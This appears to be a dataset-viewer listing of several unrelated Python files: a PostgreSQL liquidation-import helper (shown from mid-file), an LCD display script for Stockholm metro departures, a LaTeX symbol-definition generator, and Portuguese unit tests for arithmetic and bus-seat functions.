    result can be embedded in a VALUES list.
    """
    if s is None:  # idiom fix: identity check, not equality, for None
        return "null"
    return "'" + s.replace("'", "''") + "'"
def get_psql_connection():
    """Open and return a new psycopg2 connection from the module-level settings."""
    params = dict(
        user=psql_user,
        password=psql_pw,
        host=psql_host,
        port=psql_port,
        database=psql_database,
    )
    return psycopg2.connect(**params)
def query(cmd):
    """Execute *cmd* and return all fetched result rows."""
    return _query(cmd, fetch=True)
def query_no_fetch(cmd):
    """Execute *cmd* for its side effects only; no rows are fetched."""
    _query(cmd, fetch=False)
def _query(cmd, fetch):
    """Execute *cmd* on a fresh connection, commit, and optionally fetch.

    cmd   -- SQL string to execute.
    fetch -- when True, return ``cursor.fetchall()``; otherwise return None.

    BUGFIX: the original closed the cursor/connection only on the success
    path, leaking both whenever execute/commit/fetchall raised.  try/finally
    guarantees cleanup in every case.
    """
    connection = get_psql_connection()
    try:
        cursor = connection.cursor()
        try:
            cursor.execute(cmd)
            connection.commit()
            if fetch:
                return cursor.fetchall()
            return None
        finally:
            cursor.close()
    finally:
        connection.close()
def delete_liquidations():
    """Delete liquidation entries whose deadline passed more than 30 days ago.

    NOTE(review): the original docstring said "7 days" but the SQL interval
    below is 30 days -- confirm which retention period is actually intended.
    """
    query_no_fetch("DELETE FROM liquidations WHERE date < current_date - interval '30 days'")
# Script entry point: import today's SHAB entries, then prune expired rows.
liq_all_cantons()
delete_liquidations()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import time
from datetime import datetime
from pylcdsysinfo import BackgroundColours, TextColours, TextAlignment, TextLines, LCDSysInfo
from collections import deque
from time import sleep
from os import stat
import re
from suds.client import suds
from suds.client import Client
class SLAPI(object):
    """Thin wrapper around the SL (Stockholm transit) real-time SOAP API."""

    def __init__(self, uri):
        # suds builds the SOAP service proxy from the WSDL at the given URI.
        self.client = Client(uri)

    def get_departures(self, station):
        """Return a flat list of display strings, two rows per metro entry."""
        def fmt(row):
            # Missing rows become a fixed-width placeholder; otherwise
            # shorten "11 A"/"11 K" to "A"/"K" and collapse repeated spaces.
            if row is None:
                return " No Update "
            return re.sub(' +', ' ', unicode(re.sub('11 (A|K)', '\\1', row) + " "))

        rows = []
        for metro in self.client.service.GetDepartures(station).Metros.Metro:
            rows.append(fmt(metro.DisplayRow1))
            rows.append(fmt(metro.DisplayRow2))
        return rows
# --- LCD device setup -------------------------------------------------------
d = LCDSysInfo()
d.clear_lines(TextLines.ALL, BackgroundColours.BLACK)
d.dim_when_idle(False)
d.set_brightness(127)
d.save_brightness(127, 255)
d.set_text_background_colour(BackgroundColours.BLACK)
# --- Main polling loop: show metro departures + a status file on the LCD ----
try:
    api = SLAPI('http://www1.sl.se/realtidws/RealTimeService.asmx?wsdl')
    last_check = 0  # NOTE(review): assigned but never used below
    # Matches "<destination> HH:MM" or "<destination> N min" at line start.
    r = re.compile(r'([^ ]+ ([0-9]{2}:[0-9]{2}|[0-9]{1,2} min))')
    while(True):
        # Station id 9301 -- presumably the author's home station; confirm.
        c = api.get_departures(9301)
        # Trim rows 1 and 3 down to "destination + time" when they match.
        m = re.match(r, c[1])
        if m:
            s1 = m.group(0)
        else:
            s1 = c[1]
        m = re.match(r, c[3])
        if m:
            s2 = m.group(0)
        else:
            s2 = c[3]
        # File 'yw' in the working directory supplies the bottom status line.
        f = open('yw', 'r')
        yw = f.read()
        f.close()
        # Lines 1-4: two departures (two rows each); line 6: status text.
        d.display_text_on_line(1, c[0], False, TextAlignment.LEFT, TextColours.ORANGE)
        d.display_text_on_line(2, s1, False, TextAlignment.LEFT, TextColours.ORANGE)
        d.display_text_on_line(3, c[2], False, TextAlignment.LEFT, TextColours.ORANGE)
        d.display_text_on_line(4, s2, False, TextAlignment.LEFT, TextColours.ORANGE)
        d.display_text_on_line(6, yw, False, TextAlignment.CENTRE, TextColours.CYAN)
        sleep(15)
except KeyboardInterrupt:
    exit()
|
from . import OtherLine, ParsingError, SymbolSection, Symbol, parse_all_symbols
from optparse import OptionParser
import sys
def main():
    """Emit LaTeX \\newcommand definitions for symbols parsed from the input files.

    Command line:
      --select TAG   only emit symbols whose `other` dict has the field TAG
      --color COL    wrap zero-arg symbol bodies in {\\color{COL} ...}
      --markfirst    wrap zero-arg symbols in \\markfirst and emit the
                     supporting \\newbool/\\setbool machinery
    Output is written to stdout.
    """
    parser = OptionParser()
    parser.add_option("--select", help="Select by tag")
    parser.add_option("--color", help="Use this color", default=None)
    parser.add_option("--markfirst", help="Mark first command",
                      default=False, action='store_true')
    (options, args) = parser.parse_args() #@UnusedVariable
    if options.markfirst:
        # Default (pass-through) definition of \markfirst; the "%" keeps it
        # commented so a document-level definition can override it.
        sys.stdout.write("""
%\\newcommand{\\markfirst}[3]{#3}
""")
    out = sys.stdout
    def comment(el, s):
        # Emit a one-line LaTeX comment explaining why a symbol was skipped.
        s = s.replace('\n', ' ')
        out.write('%% %s: %s\n' % (el.symbol, s))
    for el in parse_all_symbols(args):
        if isinstance(el, OtherLine):
            # Non-symbol lines are copied through verbatim.
            sys.stdout.write(el.line)
            sys.stdout.write('\n')
        elif isinstance(el, Symbol):
            if options.select is not None:
                if not options.select in el.other:
                    comment(el, 'Skipped because no field %r' % options.select)
                    continue
            # Filters are rebuilt per symbol and applied immediately by
            # `wrapper` below, so the closures never see a stale `el`.
            filters = []
            if options.color:
                if el.nargs == 0:
                    def highlight(x):
                        return "{\\color{%s} %s}" % (options.color, x)
                    filters.append(highlight)
#            if options.deprecated:
#                if 'deprecated' in el.other and el.nargs == 0:
#                    def mark_deprecated(x):
#                        return "{\\color[rgb]{1,0,0} %s}" % x
#                    filters.append(highlight)
            if options.markfirst:
                if el.nargs == 0:
                    # One boolean flag per symbol tracks "already used once".
                    boolname = 'used%s' % str(el.symbol[1:])
                    def mark_first(x):
                        return ("\\markfirst{%s}{%s}{%s}" %
                                (el.symbol[1:], boolname, x))
                    filters.append(mark_first)
                    sys.stdout.write('\\newbool{%s}\\setbool{%s}{false}\n'
                                     % (boolname, boolname))
            def wrapper(x):
                # Apply all active filters, innermost first.
                for f in filters:
                    x = f(x)
                return x
            sys.stdout.write(el.tex_definition(wrapper=wrapper))
            sys.stdout.write('\n')
        elif isinstance(el, SymbolSection):
            pass
        else:
            raise ParsingError('Unknown element: {0}'.format(el), el.where)
            # Defensive marker; unreachable after the raise above.
            assert False
# Standard script entry point.
if __name__ == '__main__':
    main()
|
from unittest import TestCase
from testes_unitarios.arquivo import soma, potenciacao, subtracao, todas_as_poltronas_estao_vendidas
class TesteCoisasDeMatematica(TestCase):
    """Unit tests for the arithmetic helpers soma, potenciacao and subtracao."""

    def test_soma_basica_de_dois_numeros_positivos(self):
        for a, b, esperado in ((0, 0, 0), (1, 1, 2), (2, 2, 4)):
            self.assertEqual(esperado, soma(a, b))

    def test_soma_basica_de_dois_numeros_negativos(self):
        for a, b, esperado in ((-1, -1, -2), (-2, -2, -4)):
            self.assertEqual(esperado, soma(a, b))

    def test_potenciacao(self):
        for base, expoente, esperado in ((2, 2, 4), (1, 1, 1), (1, 0, 1)):
            self.assertEqual(esperado, potenciacao(base, expoente))

    def test_potenciacao_potencia_um(self):
        # Any base raised to the power one is the base itself.
        for base in (1, 5):
            self.assertEqual(base, potenciacao(base, 1))

    def test_subtracao(self):
        for a, b, esperado in ((5, 2, 3), (1, 1, 0)):
            self.assertEqual(esperado, subtracao(a, b))
class TesteCoisasDePassagemDeOnibus(TestCase):
    """Unit tests for todas_as_poltronas_estao_vendidas ('' = free seat)."""

    def _verifica(self, poltronas, esperado):
        # Shared helper: run the function and assert truthiness of the result.
        resultado = todas_as_poltronas_estao_vendidas(poltronas)
        if esperado:
            self.assertTrue(resultado)
        else:
            self.assertFalse(resultado)

    def test_retorna_falso_quando_nenhuma_poltrona_vendida(self):
        self._verifica(['', '', ''], False)

    def test_retorna_falso_quando_apenas_uma_poltrona_vendida(self):
        self._verifica(['', '', 'X'], False)

    def test_retorna_falso_quando_duas_poltronas_vendidas(self):
        self._verifica(['X', '', 'X'], False)

    def test_retorna_true_quando_todas_poltronas_vendidas(self):
        self._verifica(['X', 'X', 'X'], True)

    def test_retorna_true_quando_tem_poltrona_Y(self):
        self._verifica(['', '', 'Y'], True)

    def test_retorna_true_quando_tem_varias_x_e_uma__Y(self):
        self._verifica(['X', 'X', 'Y'], True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.